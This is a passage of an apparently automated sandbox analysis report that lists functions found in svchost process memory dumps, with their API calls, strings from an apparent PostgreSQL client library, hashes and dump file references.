                                                                                            • Snapshot File: hcaresult_42_2_7ffd93c40000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 433c8d796f7dbfaa30b33fdd26296c3a8614dd24921e54f212f1ee0b781c75b1
                                                                                            • Instruction ID: add177a80222954172081849fb5d597ef8f22193555ea6df2588e49488799c58
                                                                                            • Opcode Fuzzy Hash: 433c8d796f7dbfaa30b33fdd26296c3a8614dd24921e54f212f1ee0b781c75b1
                                                                                            • Instruction Fuzzy Hash: 24113022B54F058AEB10CFA0E8682B833B4FB19B58F440E31DA6E46BA4DF7CD555C340
                                                                                            Function 00007FFDA36E8BD0 Relevance: 6.0, APIs: 4, Instructions: 33networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastO_clear_flagsO_get_ex_dataO_set_flags
                                                                                            • String ID:
                                                                                            • API String ID: 1874018140-0
                                                                                            • Opcode ID: 3e522ebafb01a7a7192d964bde7573e18a5216a728ad0d138efb80b9a906ca7f
                                                                                            • Instruction ID: c8f1c1e4f923e3e87df496eedf3f26e1a64ae5a66d539130977024e005244fc6
                                                                                            • Opcode Fuzzy Hash: 3e522ebafb01a7a7192d964bde7573e18a5216a728ad0d138efb80b9a906ca7f
                                                                                            • Instruction Fuzzy Hash: BDF09611B0E65201FA14AB66A46417B4242AF86FC0F2CA034E94D6BB9BCD2ED8574348
                                                                                            Function 66005530 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strcmp
                                                                                            • String ID: C$C$S
                                                                                            • API String ID: 1004003707-2272739228
                                                                                            • Opcode ID: f062a02f17bca02a30394d8ddc461a33f3d99eb20af7da143081ee03408a4096
                                                                                            • Instruction ID: 31010b0e54f7c2621fa17eb66a3fd9eb01b4f8944ed0380a86d254caa78c60b9
                                                                                            • Opcode Fuzzy Hash: f062a02f17bca02a30394d8ddc461a33f3d99eb20af7da143081ee03408a4096
                                                                                            • Instruction Fuzzy Hash: EEF082BFE58AD45CF7078A35AE3435D2EC39345B86F8CD075CB8442295EA6CC285D701
                                                                                            Function 00007FFDA36F56D0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F56D9
                                                                                            • GetFileType.KERNEL32(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F56EE
                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F56F6
                                                                                              • Part of subcall function 00007FFDA36F5DC0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5DCC
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F33BE), ref: 00007FFDA36F571B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorFileLastType
                                                                                            • String ID:
                                                                                            • API String ID: 1834948930-0
                                                                                            • Opcode ID: 8572b1d03a423b747c884dc6c925b40c7b7076c12e5400f34441307ab3276497
                                                                                            • Instruction ID: 1353d0d5dc8ca35802f0aaf138d0d810bfd446126376fe5f8edf8be4e0b08ca2
                                                                                            • Opcode Fuzzy Hash: 8572b1d03a423b747c884dc6c925b40c7b7076c12e5400f34441307ab3276497
                                                                                            • Instruction Fuzzy Hash: B7F01250F1BB0383FB651BB1696937A12919F44731F4C2670CA29573C2DF7D98D58628
                                                                                            Function 00007FFDA36DB030 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 26stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36DB046
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36DB072
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 1114863663-2050216600
                                                                                            • Opcode ID: 610176aa919255f1728e43cf2e4db6c64170d1fb61b698b83c71e4bb3746b9da
                                                                                            • Instruction ID: 0f5ca2422dbc10f9c189024aebaf12f4b77ad012b035a4c5b2dec170ce871e7e
                                                                                            • Opcode Fuzzy Hash: 610176aa919255f1728e43cf2e4db6c64170d1fb61b698b83c71e4bb3746b9da
                                                                                            • Instruction Fuzzy Hash: 4BF03961B16A0283FB644B66F8A13352292BF88780F8C2035DC1ADB755EF2ED4958B08
                                                                                            Function 00007FFDA36E4A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenvmalloc
                                                                                            • String ID: default
                                                                                            • API String ID: 3016273935-3814588639
                                                                                            • Opcode ID: e2bfb641286572b36a264d66209c0ca91ee167bda718b6a6fa8c4d1c5e4005ce
                                                                                            • Instruction ID: 60d8419ca783b915b40c4e473d7de4527dc0854a186bf2cf1fc4812de0d3247e
                                                                                            • Opcode Fuzzy Hash: e2bfb641286572b36a264d66209c0ca91ee167bda718b6a6fa8c4d1c5e4005ce
                                                                                            • Instruction Fuzzy Hash: 6051D462F0A6854DFF668A3998213742A91AF55BB4F2D2330DE3D133D6EA6ED8458304
                                                                                            Function 00007FFDA36F1DB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: (null)
                                                                                            • API String ID: 2918714741-3941151225
                                                                                            • Opcode ID: 07fed7616e3a56c82322c18febf21bee99f285bf009ae68b25a5bd7017957771
                                                                                            • Instruction ID: f4cb3767bc909d92eb5ccaf2d110522b8286ec571c89d9493e6b430060b1fbac
                                                                                            • Opcode Fuzzy Hash: 07fed7616e3a56c82322c18febf21bee99f285bf009ae68b25a5bd7017957771
                                                                                            • Instruction Fuzzy Hash: CC51E462B0EAC14AF724CF16B450369BBD2EB89794F489131CA8D537A6DE3ED042CB04
                                                                                            Function 66015FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: qsort
                                                                                            • String ID: CP437
                                                                                            • API String ID: 1928336220-2110281557
                                                                                            • Opcode ID: 4b575217914c229fa3baac5c6b83875f0a4f44436d4fc877355de5328b9c1cca
                                                                                            • Instruction ID: ad68cacdd32ef68dfc225230e7c63045a68a48554a04fc757c47b7813bb30f08
                                                                                            • Opcode Fuzzy Hash: 4b575217914c229fa3baac5c6b83875f0a4f44436d4fc877355de5328b9c1cca
                                                                                            • Instruction Fuzzy Hash: 2D31F3B3B29A4186EF10CF96EC14B9AFBA6F755BC9F898036DD0907710DA3AC156C700
                                                                                            Function 00007FFDA36D9240 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D6A6A,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D92D6
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D6A6A,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D92DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfree
                                                                                            • String ID: out of memory
                                                                                            • API String ID: 1865132094-2599737071
                                                                                            • Opcode ID: 57c80bfd9c969e103fb3ce411b1eb1d7baa43ee6e9a46ea25e009e22ddf0c3c9
                                                                                            • Instruction ID: 4d71f2d9ae9c0b3f5a7ca0dcb2482654a65a3baaac07334061cf4ec913d2c991
                                                                                            • Opcode Fuzzy Hash: 57c80bfd9c969e103fb3ce411b1eb1d7baa43ee6e9a46ea25e009e22ddf0c3c9
                                                                                            • Instruction Fuzzy Hash: 95214D26B1AB8281FAA48F52A16037577A2EB45BC4F0C6035DE4D6775AEE3EE441C708
                                                                                            Function 00007FFDA36E8A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __acrt_iob_funcstrncpy
                                                                                            • String ID: WARNING: sslpassword truncated
                                                                                            • API String ID: 238952937-152383654
                                                                                            • Opcode ID: 57e208369fac4125e9a644b43e5d44808023319e1ee4e83fd80ee9f620568ffd
                                                                                            • Instruction ID: 4a74da5b1da01b78e1c9ad5513b576506915395cf6253023966283eb1b0a73d2
                                                                                            • Opcode Fuzzy Hash: 57e208369fac4125e9a644b43e5d44808023319e1ee4e83fd80ee9f620568ffd
                                                                                            • Instruction Fuzzy Hash: 3121F522B0AB8185F7509B1AB450269A762EB45BE4F1C2230DF5E177DACF7ED4828304
                                                                                            Function 00007FFDA36E02A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DDDF2,00000000,?,00000000,00007FFDA36DDA51), ref: 00007FFDA36E02F7
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36DDDF2,00000000,?,00000000,00007FFDA36DDA51), ref: 00007FFDA36E02FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: mallocrealloc
                                                                                            • String ID: PGresult cannot support more than INT_MAX tuples
                                                                                            • API String ID: 948496778-782348856
                                                                                            • Opcode ID: 930dd4e4782057fd6c1d2e89aa03dc5a7a7104af9cfb9d2bb88b4f0452e449ea
                                                                                            • Instruction ID: 77a85e1be13a25ddce07c6812ef915e614017444097e3c308e82d69d868165e7
                                                                                            • Opcode Fuzzy Hash: 930dd4e4782057fd6c1d2e89aa03dc5a7a7104af9cfb9d2bb88b4f0452e449ea
                                                                                            • Instruction Fuzzy Hash: 7D218372B0AB42C6FA148F16E060178A3A2FB54B80B3C5531DA5DA7356DF3DD456C708
                                                                                            Function 00007FFDA36E7FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __acrt_iob_funcstrncpy
                                                                                            • String ID: WARNING: sslpassword truncated
                                                                                            • API String ID: 238952937-152383654
                                                                                            • Opcode ID: 37de99b39b668d6341e98231ed23e357f6566f7912e7a45ebc3c6ddf0a545320
                                                                                            • Instruction ID: a58d92583bf5e62d63e26beaf622e5e0fe493b66737a9eaae85ce69afa194ad7
                                                                                            • Opcode Fuzzy Hash: 37de99b39b668d6341e98231ed23e357f6566f7912e7a45ebc3c6ddf0a545320
                                                                                            • Instruction Fuzzy Hash: B9116321B0AB8585F7509B15B4A03796792FB4ABE4F1C2230DF9E57796CF3ED4868304
                                                                                            Function 00007FFDA36E1D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E2253,?,?,?,?,?,?,show password_encryption,00007FFDA36DB0A5), ref: 00007FFDA36E1D46
                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E2253,?,?,?,?,?,?,show password_encryption,00007FFDA36DB0A5), ref: 00007FFDA36E1D99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: realloc
                                                                                            • String ID: cannot allocate memory for output buffer
                                                                                            • API String ID: 471065373-1435837941
                                                                                            • Opcode ID: 9772881e1c64637cd21e2e420743611e98e768787acaeea38add0a32b9479228
                                                                                            • Instruction ID: 42ec07a1cc72a99b64f0ce5ae41b2dfddf6e9b8280bef1856cf13109d1d147a0
                                                                                            • Opcode Fuzzy Hash: 9772881e1c64637cd21e2e420743611e98e768787acaeea38add0a32b9479228
                                                                                            • Instruction Fuzzy Hash: 4811B622B16B8183FB648F55F4A036AA252FF44BC0F0C6131E75D17796EF6DE4448304
                                                                                            Function 00007FFDA36DCA60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DCAE3
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                              • Part of subcall function 00007FFDA36EBD40: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EBD58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfreemalloc
                                                                                            • String ID: PGresult is not an error result$out of memory
                                                                                            • API String ID: 3985033223-3630110109
                                                                                            • Opcode ID: 9e53c121f6d4eb1b885a78657c011e8ee84612e85442a61ba8fc4b3a20d8aaf4
                                                                                            • Instruction ID: 07025f065fd6dd5fc11ae5214d47a4ca9cf595f47615502c81b04cbd3761b75e
                                                                                            • Opcode Fuzzy Hash: 9e53c121f6d4eb1b885a78657c011e8ee84612e85442a61ba8fc4b3a20d8aaf4
                                                                                            • Instruction Fuzzy Hash: CC01E523B0DA8682FA20CB05F060169A361FFC4BD0F4C1131EE4E63B5ADE6DD9458B04
                                                                                            Function 00007FFDA36D3100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32 ref: 00007FFDA36D314F
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFA8
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFE0
                                                                                              • Part of subcall function 00007FFDA36EBF90: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EC079
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$FormatMessagerealloc
                                                                                            • String ID: %s: %s (%x)$%s: SSPI error %x
                                                                                            • API String ID: 3717000109-2285168158
                                                                                            • Opcode ID: 5db511b980a8cbb20cd3963e3259cd84e9b3694283f0e42cd4f45bad40790d0b
                                                                                            • Instruction ID: 3ece851bf656cc278148bbdb20ae659eada562f5619ed77bd014211327c1e5bb
                                                                                            • Opcode Fuzzy Hash: 5db511b980a8cbb20cd3963e3259cd84e9b3694283f0e42cd4f45bad40790d0b
                                                                                            • Instruction Fuzzy Hash: 3E01D232B1AA8282F7208B55E8217E67762FF887C8F481035EA4C17B66DF3DD405CB08
                                                                                            Function 00007FFDA361D364 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: M_construct_endM_construct_uint32
                                                                                            • String ID: mode
                                                                                            • API String ID: 3782155166-2546616235
                                                                                            • Opcode ID: 1c1a152bfd3b3512593df79d7ec5de0e47f139f25948413791f2350153563ce1
                                                                                            • Instruction ID: d9cc37091740b9a05d824b399273e68686c13d2c1cf8d7c61c38b150bde30e68
                                                                                            • Opcode Fuzzy Hash: 1c1a152bfd3b3512593df79d7ec5de0e47f139f25948413791f2350153563ce1
                                                                                            • Instruction Fuzzy Hash: 7B110D22909BC486E3228F38D0512E9B771FBD9788F449261DB8D1725BEF28D1C5DB00
                                                                                            Function 00007FFDA36EAB0B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
